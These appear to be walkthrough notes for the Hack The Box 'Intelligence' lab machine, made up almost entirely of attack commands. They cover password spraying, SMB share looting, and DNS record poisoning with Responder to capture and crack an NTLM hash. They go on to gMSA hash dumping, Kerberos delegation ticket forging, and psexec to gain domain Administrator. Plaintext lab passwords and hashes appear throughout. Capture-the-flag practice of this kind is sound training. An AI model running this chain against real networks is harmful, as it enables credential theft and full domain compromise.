Foothold

#!/bin/bash
for month in {01..12}; do
    for day in {01..31}; do
        wget http://10.10.10.248/documents/2020-$month-$day-upload.pdf
    done
done

exiftool 2020-* | grep -i creator | awk -F: '{print $2}' | sed 's/^[ \t]*//' | sort -u > users.txt
for i in $(ls 2020-*); do open $i; done
NewIntelligenceCorpUser9876
netexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-success
Tiffany.Molina:NewIntelligenceCorpUser9876
netexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 --shares
adot@kali:~/oscp/htb/windows/intelligence$ smbclient "\\\\10.10.10.248\\Users" -U  Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 20:20:26 2021
  ..                                 DR        0  Sun Apr 18 20:20:26 2021
  Administrator                       D        0  Sun Apr 18 19:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 02:21:46 2018
  Default                           DHR        0  Sun Apr 18 21:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 02:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 02:11:27 2018
  Public                             DR        0  Sun Apr 18 19:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 20:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 19:51:46 2021

		3770367 blocks of size 4096. 1418574 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
$ smbclient "\\\\10.10.10.248\\IT" -U  Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 19:50:55 2021
  ..                                  D        0  Sun Apr 18 19:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 19:50:55 2021

		3770367 blocks of size 4096. 1419262 blocks available
smb: \> mget downdetector.ps1 
Get file downdetector.ps1? y
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \> exit
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

Ted.Graves
bloodhound-python -d intelligence.htb -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -ns 10.10.10.248 -c all

Add a dns A record

python dnstool.py -u 'intelligence.htb\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webad0t8.intelligence.htb -a add -t A -d 10.10.14.6 10.10.10.248

Got a call back

sudo responder -I tun0
hashcat -m 5600 ted.hash ~/rockyou.txt -O
python gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
netexec smb 10.10.10.248 -u svc_int$ -H 51e4932f13712047027300f869d07ab6
impacket-getST -spn http/dc.intelligence.htb -impersonate Administrator -u intelligence/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6
etST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6
export KRB5CCNAME=$(pwd)/Administrator.ccache 
impacket-psexec -k -no-pass intelligence.htb/[email protected]
PreviousPage 2NextEnumeration

Last updated

Was this helpful?